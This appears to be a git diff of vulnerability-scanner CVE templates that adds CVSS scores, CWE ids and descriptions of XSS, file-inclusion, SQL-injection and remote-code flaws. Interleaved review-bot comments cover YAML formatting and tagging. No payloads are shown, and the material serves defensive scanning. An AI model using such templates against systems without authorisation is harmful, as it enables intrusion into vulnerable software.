cves/2019/CVE-2019-19134.yaml | 5 +++++ cves/2019/CVE-2019-19368.yaml | 5 +++++ cves/2019/CVE-2019-19781.yaml | 7 ++++++- cves/2019/CVE-2019-19908.yaml | 5 +++++ cves/2019/CVE-2019-19985.yaml | 5 +++++ cves/2019/CVE-2019-20085.yaml | 5 +++++ cves/2019/CVE-2019-20141.yaml | 5 +++++ cves/2019/CVE-2019-2588.yaml | 6 +++++- cves/2019/CVE-2019-2616.yaml | 4 ++++ cves/2019/CVE-2019-2725.yaml | 5 +++++ cves/2019/CVE-2019-2767.yaml | 4 ++++ cves/2019/CVE-2019-3396.yaml | 7 ++++++- cves/2019/CVE-2019-3401.yaml | 7 ++++++- cves/2019/CVE-2019-3402.yaml | 5 +++++ cves/2019/CVE-2019-3403.yaml | 5 +++++ cves/2019/CVE-2019-3799.yaml | 7 ++++++- cves/2019/CVE-2019-5127.yaml | 5 +++++ cves/2019/CVE-2019-5418.yaml | 6 +++++- cves/2019/CVE-2019-6112.yaml | 5 +++++ cves/2019/CVE-2019-6340.yaml | 7 ++++++- cves/2019/CVE-2019-6715.yaml | 7 +++++++ cves/2019/CVE-2019-7219.yaml | 7 ++++++- cves/2019/CVE-2019-7238.yaml | 5 +++++ cves/2019/CVE-2019-7254.yaml | 6 ++++++ cves/2019/CVE-2019-7256.yaml | 5 +++++ cves/2019/CVE-2019-7275.yaml | 8 +++++++- cves/2019/CVE-2019-7481.yaml | 5 +++++ cves/2019/CVE-2019-7609.yaml | 5 +++++ cves/2019/CVE-2019-8442.yaml | 6 +++++- cves/2019/CVE-2019-8446.yaml | 8 ++++++++ cves/2019/CVE-2019-8449.yaml | 5 +++++ cves/2019/CVE-2019-8451.yaml | 5 +++++ cves/2019/CVE-2019-8903.yaml | 5 +++++ cves/2019/CVE-2019-8937.yaml | 6 ++++++ cves/2019/CVE-2019-8982.yaml | 7 ++++++- cves/2019/CVE-2019-9041.yaml | 5 +++++ cves/2019/CVE-2019-9618.yaml | 7 ++++++- cves/2019/CVE-2019-9670.yaml | 12 ++++++++++++ cves/2019/CVE-2019-9733.yaml | 4 ++++ cves/2019/CVE-2019-9955.yaml | 7 ++++++- cves/2019/CVE-2019-9978.yaml | 7 ++++++- cves/2020/CVE-2020-0618.yaml | 5 +++++ cves/2020/CVE-2020-10148.yaml | 7 ++++++- cves/2020/CVE-2020-10546.yaml | 7 ++++++- cves/2020/CVE-2020-10547.yaml | 7 ++++++- cves/2020/CVE-2020-10548.yaml | 7 ++++++- cves/2020/CVE-2020-10549.yaml | 7 ++++++- cves/2020/CVE-2020-11034.yaml | 7 ++++++- cves/2020/CVE-2020-11110.yaml | 5 +++++ 
cves/2020/CVE-2020-11455.yaml | 7 ++++++- cves/2020/CVE-2020-11547.yaml | 5 +++++ cves/2020/CVE-2020-11710.yaml | 6 +++++- cves/2020/CVE-2020-11738.yaml | 5 +++++ cves/2020/CVE-2020-11853.yaml | 4 ++++ cves/2020/CVE-2020-11854.yaml | 5 +++++ cves/2020/CVE-2020-11930.yaml | 5 +++++ cves/2020/CVE-2020-11978.yaml | 5 +++++ cves/2020/CVE-2020-11991.yaml | 5 +++++ cves/2020/CVE-2020-12054.yaml | 5 +++++ cves/2020/CVE-2020-12116.yaml | 5 +++++ cves/2020/CVE-2020-12720.yaml | 5 +++++ cves/2020/CVE-2020-12800.yaml | 5 +++++ cves/2020/CVE-2020-13117.yaml | 5 +++++ cves/2020/CVE-2020-13167.yaml | 5 +++++ cves/2020/CVE-2020-13483.yaml | 7 ++++++- cves/2020/CVE-2020-13700.yaml | 5 +++++ cves/2020/CVE-2020-13927.yaml | 8 ++++++++ cves/2020/CVE-2020-13937.yaml | 5 +++++ cves/2020/CVE-2020-13942.yaml | 5 +++++ cves/2020/CVE-2020-14092.yaml | 5 +++++ cves/2020/CVE-2020-14179.yaml | 4 ++++ cves/2020/CVE-2020-14181.yaml | 5 +++++ cves/2020/CVE-2020-14413.yaml | 5 +++++ cves/2020/CVE-2020-14864.yaml | 4 ++++ cves/2020/CVE-2020-14882.yaml | 4 ++++ cves/2020/CVE-2020-14883.yaml | 6 +++++- cves/2020/CVE-2020-15129.yaml | 5 +++++ cves/2020/CVE-2020-15148.yaml | 8 +++++++- cves/2020/CVE-2020-15227.yaml | 7 ++++++- cves/2020/CVE-2020-15500.yaml | 6 ++++++ cves/2020/CVE-2020-15505.yaml | 4 ++++ cves/2020/CVE-2020-15568.yaml | 5 +++++ cves/2020/CVE-2020-15920.yaml | 5 +++++ cves/2020/CVE-2020-16139.yaml | 6 +++++- cves/2020/CVE-2020-16846.yaml | 5 +++++ cves/2020/CVE-2020-16952.yaml | 7 ++++++- cves/2020/CVE-2020-17362.yaml | 5 +++++ cves/2020/CVE-2020-17453.yaml | 5 +++++ cves/2020/CVE-2020-17496.yaml | 5 +++++ cves/2020/CVE-2020-17505.yaml | 5 +++++ cves/2020/CVE-2020-17506.yaml | 5 +++++ cves/2020/CVE-2020-17518.yaml | 7 ++++++- cves/2020/CVE-2020-17519.yaml | 5 +++++ cves/2020/CVE-2020-17530.yaml | 5 +++++ cves/2020/CVE-2020-1938.yaml | 8 +++++++- cves/2020/CVE-2020-1943.yaml | 5 +++++ cves/2020/CVE-2020-19625.yaml | 6 +++++- cves/2020/CVE-2020-2036.yaml | 7 ++++++- 
cves/2020/CVE-2020-2096.yaml | 5 +++++ cves/2020/CVE-2020-21224.yaml | 5 +++++ cves/2020/CVE-2020-2140.yaml | 5 +++++ cves/2020/CVE-2020-22840.yaml | 11 ++++++++++- cves/2020/CVE-2020-23517.yaml | 5 +++++ cves/2020/CVE-2020-23972.yaml | 5 +++++ cves/2020/CVE-2020-24148.yaml | 5 +++++ cves/2020/CVE-2020-24186.yaml | 5 +++++ cves/2020/CVE-2020-24223.yaml | 5 +++++ cves/2020/CVE-2020-24312.yaml | 5 +++++ cves/2020/CVE-2020-24550.yaml | 5 +++++ cves/2020/CVE-2020-24571.yaml | 5 +++++ cves/2020/CVE-2020-24579.yaml | 7 ++++++- cves/2020/CVE-2020-24949.yaml | 4 ++++ cves/2020/CVE-2020-25078.yaml | 4 ++++ cves/2020/CVE-2020-25213.yaml | 5 +++++ cves/2020/CVE-2020-25223.yaml | 4 ++++ cves/2020/CVE-2020-25495.yaml | 5 +++++ cves/2020/CVE-2020-25506.yaml | 5 +++++ cves/2020/CVE-2020-2551.yaml | 4 ++++ cves/2020/CVE-2020-25540.yaml | 7 ++++++- cves/2020/CVE-2020-26153.yaml | 5 +++++ cves/2020/CVE-2020-26214.yaml | 5 +++++ cves/2020/CVE-2020-26919.yaml | 4 ++++ cves/2020/CVE-2020-26948.yaml | 5 +++++ cves/2020/CVE-2020-27361.yaml | 5 +++++ cves/2020/CVE-2020-27735.yaml | 5 +++++ cves/2020/CVE-2020-27866.yaml | 5 +++++ cves/2020/CVE-2020-27982.yaml | 5 +++++ cves/2020/CVE-2020-27986.yaml | 7 ++++++- cves/2020/CVE-2020-28188.yaml | 5 +++++ cves/2020/CVE-2020-28208.yaml | 5 +++++ cves/2020/CVE-2020-28871.yaml | 5 +++++ cves/2020/CVE-2020-28976.yaml | 7 ++++++- cves/2020/CVE-2020-29164.yaml | 5 +++++ cves/2020/CVE-2020-29227.yaml | 6 +++++- cves/2020/CVE-2020-29395.yaml | 5 +++++ cves/2020/CVE-2020-29453.yaml | 5 +++++ cves/2020/CVE-2020-3187.yaml | 7 ++++++- cves/2020/CVE-2020-3452.yaml | 7 ++++++- cves/2020/CVE-2020-35338.yaml | 5 +++++ cves/2020/CVE-2020-35476.yaml | 5 +++++ cves/2020/CVE-2020-35489.yaml | 5 +++++ cves/2020/CVE-2020-35580.yaml | 5 +++++ cves/2020/CVE-2020-35598.yaml | 5 +++++ cves/2020/CVE-2020-35713.yaml | 5 +++++ cves/2020/CVE-2020-35729.yaml | 5 +++++ cves/2020/CVE-2020-35736.yaml | 5 +++++ cves/2020/CVE-2020-35774.yaml | 5 +++++ cves/2020/CVE-2020-3580.yaml 
| 5 +++++ cves/2020/CVE-2020-35846.yaml | 5 +++++ cves/2020/CVE-2020-35847.yaml | 5 +++++ cves/2020/CVE-2020-35848.yaml | 5 +++++ cves/2020/CVE-2020-35951.yaml | 5 +++++ cves/2020/CVE-2020-36112.yaml | 5 +++++ cves/2020/CVE-2020-36289.yaml | 5 +++++ cves/2020/CVE-2020-4463.yaml | 5 +++++ cves/2020/CVE-2020-5284.yaml | 5 +++++ cves/2020/CVE-2020-5307.yaml | 5 +++++ cves/2020/CVE-2020-5405.yaml | 7 ++++++- cves/2020/CVE-2020-5410.yaml | 5 +++++ cves/2020/CVE-2020-5412.yaml | 5 +++++ cves/2020/CVE-2020-5776.yaml | 5 +++++ cves/2020/CVE-2020-5777.yaml | 7 ++++++- cves/2020/CVE-2020-5847.yaml | 7 ++++++- cves/2020/CVE-2020-5902.yaml | 7 ++++++- cves/2020/CVE-2020-6207.yaml | 5 +++++ cves/2020/CVE-2020-6287.yaml | 5 +++++ cves/2020/CVE-2020-6308.yaml | 6 ++++++ cves/2020/CVE-2020-6637.yaml | 7 ++++++- cves/2020/CVE-2020-7209.yaml | 4 ++++ cves/2020/CVE-2020-7247.yaml | 6 ++++++ cves/2020/CVE-2020-7318.yaml | 5 +++++ cves/2020/CVE-2020-7796.yaml | 5 +++++ cves/2020/CVE-2020-7961.yaml | 5 +++++ cves/2020/CVE-2020-8091.yaml | 5 +++++ cves/2020/CVE-2020-8115.yaml | 5 +++++ cves/2020/CVE-2020-8163.yaml | 5 +++++ cves/2020/CVE-2020-8191.yaml | 7 ++++++- cves/2020/CVE-2020-8193.yaml | 7 ++++++- cves/2020/CVE-2020-8194.yaml | 7 ++++++- cves/2020/CVE-2020-8209.yaml | 5 +++++ cves/2020/CVE-2020-8512.yaml | 5 +++++ cves/2020/CVE-2020-8515.yaml | 5 +++++ cves/2020/CVE-2020-8771.yaml | 6 ++++++ cves/2020/CVE-2020-8813.yaml | 7 ++++++- cves/2020/CVE-2020-8982.yaml | 5 +++++ cves/2020/CVE-2020-9036.yaml | 6 ++++++ cves/2020/CVE-2020-9047.yaml | 5 +++++ cves/2020/CVE-2020-9054.yaml | 5 +++++ cves/2020/CVE-2020-9315.yaml | 6 ++++++ cves/2020/CVE-2020-9344.yaml | 5 +++++ cves/2020/CVE-2020-9376.yaml | 5 +++++ cves/2020/CVE-2020-9402.yaml | 5 +++++ cves/2020/CVE-2020-9425.yaml | 5 +++++ cves/2020/CVE-2020-9483.yaml | 5 +++++ cves/2020/CVE-2020-9484.yaml | 5 +++++ cves/2020/CVE-2020-9490.yaml | 7 ++++++- cves/2020/CVE-2020-9496.yaml | 5 +++++ cves/2020/CVE-2020-9757.yaml | 10 ++++++++++ 
cves/2021/CVE-2021-1497.yaml | 5 +++++ cves/2021/CVE-2021-20090.yaml | 5 +++++ cves/2021/CVE-2021-20091.yaml | 6 +++++- cves/2021/CVE-2021-20092.yaml | 7 ++++++- cves/2021/CVE-2021-20114.yaml | 5 +++++ cves/2021/CVE-2021-21234.yaml | 5 +++++ cves/2021/CVE-2021-21307.yaml | 5 +++++ cves/2021/CVE-2021-21315.yaml | 5 +++++ cves/2021/CVE-2021-21389.yaml | 7 ++++++- cves/2021/CVE-2021-21402.yaml | 7 ++++++- cves/2021/CVE-2021-21479.yaml | 5 +++++ cves/2021/CVE-2021-21801.yaml | 5 +++++ cves/2021/CVE-2021-21802.yaml | 5 +++++ cves/2021/CVE-2021-21803.yaml | 5 +++++ cves/2021/CVE-2021-21816.yaml | 5 +++++ cves/2021/CVE-2021-21972.yaml | 5 +++++ cves/2021/CVE-2021-21975.yaml | 7 ++++++- cves/2021/CVE-2021-21978.yaml | 5 +++++ cves/2021/CVE-2021-21985.yaml | 5 +++++ cves/2021/CVE-2021-22122.yaml | 5 +++++ cves/2021/CVE-2021-22145.yaml | 5 +++++ cves/2021/CVE-2021-22214.yaml | 7 ++++++- cves/2021/CVE-2021-22873.yaml | 7 ++++++- cves/2021/CVE-2021-22986.yaml | 4 ++++ cves/2021/CVE-2021-23241.yaml | 5 +++++ cves/2021/CVE-2021-24146.yaml | 5 +++++ cves/2021/CVE-2021-24176.yaml | 5 +++++ cves/2021/CVE-2021-24210.yaml | 7 ++++++- cves/2021/CVE-2021-24235.yaml | 6 ++++++ cves/2021/CVE-2021-24237.yaml | 5 +++++ cves/2021/CVE-2021-24285.yaml | 5 +++++ cves/2021/CVE-2021-24288.yaml | 5 +++++ cves/2021/CVE-2021-24291.yaml | 5 +++++ cves/2021/CVE-2021-24298.yaml | 5 +++++ cves/2021/CVE-2021-24316.yaml | 5 +++++ cves/2021/CVE-2021-24320.yaml | 5 +++++ cves/2021/CVE-2021-24335.yaml | 5 +++++ cves/2021/CVE-2021-24340.yaml | 7 ++++++- cves/2021/CVE-2021-24387.yaml | 5 +++++ cves/2021/CVE-2021-24389.yaml | 5 +++++ cves/2021/CVE-2021-24406.yaml | 7 ++++++- cves/2021/CVE-2021-24472.yaml | 7 ++++++- cves/2021/CVE-2021-24495.yaml | 5 +++++ cves/2021/CVE-2021-24498.yaml | 5 +++++ cves/2021/CVE-2021-25281.yaml | 5 +++++ cves/2021/CVE-2021-25646.yaml | 7 ++++++- cves/2021/CVE-2021-26084.yaml | 5 +++++ cves/2021/CVE-2021-26086.yaml | 5 +++++ cves/2021/CVE-2021-26295.yaml | 5 +++++ 
cves/2021/CVE-2021-26475.yaml | 5 +++++ cves/2021/CVE-2021-26710.yaml | 5 +++++ cves/2021/CVE-2021-26722.yaml | 5 +++++ cves/2021/CVE-2021-26723.yaml | 5 +++++ cves/2021/CVE-2021-26812.yaml | 5 +++++ cves/2021/CVE-2021-26855.yaml | 4 ++++ cves/2021/CVE-2021-27132.yaml | 10 +++++++++- cves/2021/CVE-2021-27330.yaml | 5 +++++ cves/2021/CVE-2021-27651.yaml | 5 +++++ cves/2021/CVE-2021-27850.yaml | 5 +++++ cves/2021/CVE-2021-27905.yaml | 7 ++++++- cves/2021/CVE-2021-28149.yaml | 5 +++++ cves/2021/CVE-2021-28150.yaml | 5 +++++ cves/2021/CVE-2021-28151.yaml | 5 +++++ cves/2021/CVE-2021-28164.yaml | 5 +++++ cves/2021/CVE-2021-28169.yaml | 5 +++++ cves/2021/CVE-2021-28918.yaml | 5 +++++ cves/2021/CVE-2021-28937.yaml | 7 ++++++- cves/2021/CVE-2021-29156.yaml | 5 +++++ cves/2021/CVE-2021-29203.yaml | 5 +++++ cves/2021/CVE-2021-29441.yaml | 7 ++++++- cves/2021/CVE-2021-29442.yaml | 5 +++++ cves/2021/CVE-2021-29484.yaml | 5 +++++ cves/2021/CVE-2021-29622.yaml | 5 +++++ cves/2021/CVE-2021-29625.yaml | 5 +++++ cves/2021/CVE-2021-30151.yaml | 7 ++++++- cves/2021/CVE-2021-3017.yaml | 4 ++++ cves/2021/CVE-2021-3019.yaml | 7 ++++++- cves/2021/CVE-2021-30461.yaml | 5 +++++ cves/2021/CVE-2021-31249.yaml | 4 ++++ cves/2021/CVE-2021-31250.yaml | 5 +++++ cves/2021/CVE-2021-3129.yaml | 4 ++++ cves/2021/CVE-2021-31537.yaml | 5 +++++ cves/2021/CVE-2021-31581.yaml | 6 ++++++ cves/2021/CVE-2021-31755.yaml | 5 +++++ cves/2021/CVE-2021-31856.yaml | 5 +++++ cves/2021/CVE-2021-32030.yaml | 7 ++++++- cves/2021/CVE-2021-3223.yaml | 5 +++++ cves/2021/CVE-2021-32305.yaml | 5 +++++ cves/2021/CVE-2021-32819.yaml | 6 +++++- cves/2021/CVE-2021-32820.yaml | 8 +++++++- cves/2021/CVE-2021-3297.yaml | 5 +++++ cves/2021/CVE-2021-33221.yaml | 7 ++++++- cves/2021/CVE-2021-33564.yaml | 6 ++++++ cves/2021/CVE-2021-3374.yaml | 5 +++++ cves/2021/CVE-2021-3377.yaml | 5 +++++ cves/2021/CVE-2021-3378.yaml | 5 +++++ cves/2021/CVE-2021-33807.yaml | 5 +++++ cves/2021/CVE-2021-33904.yaml | 5 +++++ 
cves/2021/CVE-2021-34370.yaml | 5 +++++ cves/2021/CVE-2021-34429.yaml | 5 +++++ cves/2021/CVE-2021-34473.yaml | 4 ++++ cves/2021/CVE-2021-34621.yaml | 6 ++++++ cves/2021/CVE-2021-35464.yaml | 5 +++++ cves/2021/CVE-2021-36380.yaml | 5 +++++ cves/2021/CVE-2021-37216.yaml | 5 +++++ cves/2021/CVE-2021-37538.yaml | 7 ++++++- cves/2021/CVE-2021-37573.yaml | 6 ++++++ cves/2021/CVE-2021-37704.yaml | 7 ++++++- cves/2021/CVE-2021-38702.yaml | 5 +++++ cves/2021/CVE-2021-38751.yaml | 5 +++++ 547 files changed, 2998 insertions(+), 143 deletions(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 05714d8b90..1fe124e5d4 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -10,6 +10,11 @@ info: - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index d7ca7ac309..ed80489fb4 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 05ae7013e2..4b827a6e88 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml 
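Review bot: The new `cvss-score: 6.10` in the CVE-2011-4336 classification block is a plain scalar, so a YAML loader reads it as the float 6.1 and the trailing zero never reaches the consumer. If the field is numeric, as the unquoted form implies, write `cvss-score: 6.1` and drop the padding; the same applies to every classification block added in this patch (9.80, 7.50, 4.30, 8.20 in the hunks on the following lines). Keeping the value numeric rather than quoting it is the right call here, since a quoted `"6.10"` would change the field's type for the loader.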
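Review bot: The added `description:` for CVE-2012-4242 is appended after `tags`, making it the last key of `info`, whereas templates that already carry a description (see the CVE-2014-6271 context further down this patch) place it directly after `severity`. Moving the new line up so the block reads name, author, severity, description, reference, tags keeps the `info` layout uniform across the repository. The same end-of-block placement appears in the other description hunks of this patch (CVE-2013-2287, CVE-2013-3526, CVE-2014-4210, CVE-2014-6308, CVE-2014-9094, CVE-2015-2807) and in the blocks that add both classification and description.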
@@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index b081219b53..a65162e1be 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index e4dff03126..61d21ce54c 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml @@ -7,6 +7,11 @@ info: author: geeknik severity: critical tags: cve,cve2014,sqli,lighttpd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index d25a27bc60..b593394d70 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -9,6 +9,11 @@ info: - https://snyk.io/vuln/npm:st:20140206 severity: high tags: cve,cve2014,lfi,nodejs,st + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2014-3744 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index cc9b0f8793..42932519fa 100644 
--- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -8,6 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html + description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." requests: - method: GET diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 95bd42d005..8e6d8424d8 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d1f974d279..d226a920db 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml 
@@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 07e8d11779..6c5db06412 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -3,13 +3,18 @@ id: CVE-2014-6271 info: name: Shellshock author: pentest_swissky - severity: high + severity: critical description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 requests: - method: GET path: diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index bc9fe62650..7b52384af9 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html tags: cve,cve2014,lfi + description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET 
diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 81ae8ce817..12b29d2090 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 tags: cve,2014,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index b9a13af787..75c35ff769 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index f70ef7d40a..67ed7522de 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2080 info: name: Eclipse Jetty Remote Leakage author: pikpikcu - severity: medium + severity: high reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html 
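Review bot: The `tags:` context line in the CVE-2014-9094 hunk reads `cve,2014,wordpress,xss,wp-plugin` — the year tag lacks the `cve` prefix used by every other template in this patch, so a run filtered on `cve2014` will skip this template. Since the commit is already editing this `info` block, it is the right moment to correct it to `tags: cve,cve2014,wordpress,xss,wp-plugin`. The line is unchanged by the commit, so this is a follow-up rather than a defect in the added lines.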
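Review bot: The classification added to CVE-2015-1000012 carries `cwe-id: CWE-200` while the template is tagged `lfi` and its new description calls it a local file inclusion; the two other traversal/LFI templates annotated in this patch (CVE-2014-3744, CVE-2015-9480) use `cwe-id: CWE-22`. If the NVD record really lists CWE-200 for this entry, keep it, otherwise align it with the others. Either way a one-line comment such as `# cwe-id follows the NVD record, not the lfi tag` would stop the next annotation pass from re-raising the question.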
@@ -11,6 +11,11 @@ info: description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak tags: cve,cve2015,jetty + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-2080 + cwe-id: CWE-200 requests: - method: POST diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index ddb93e60fb..b39565c245 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -8,6 +8,7 @@ info: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 63d74145e0..23b0e18646 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 tags: cve,cve2015,xss,itop + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index cc437482ec..266da313a8 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml 
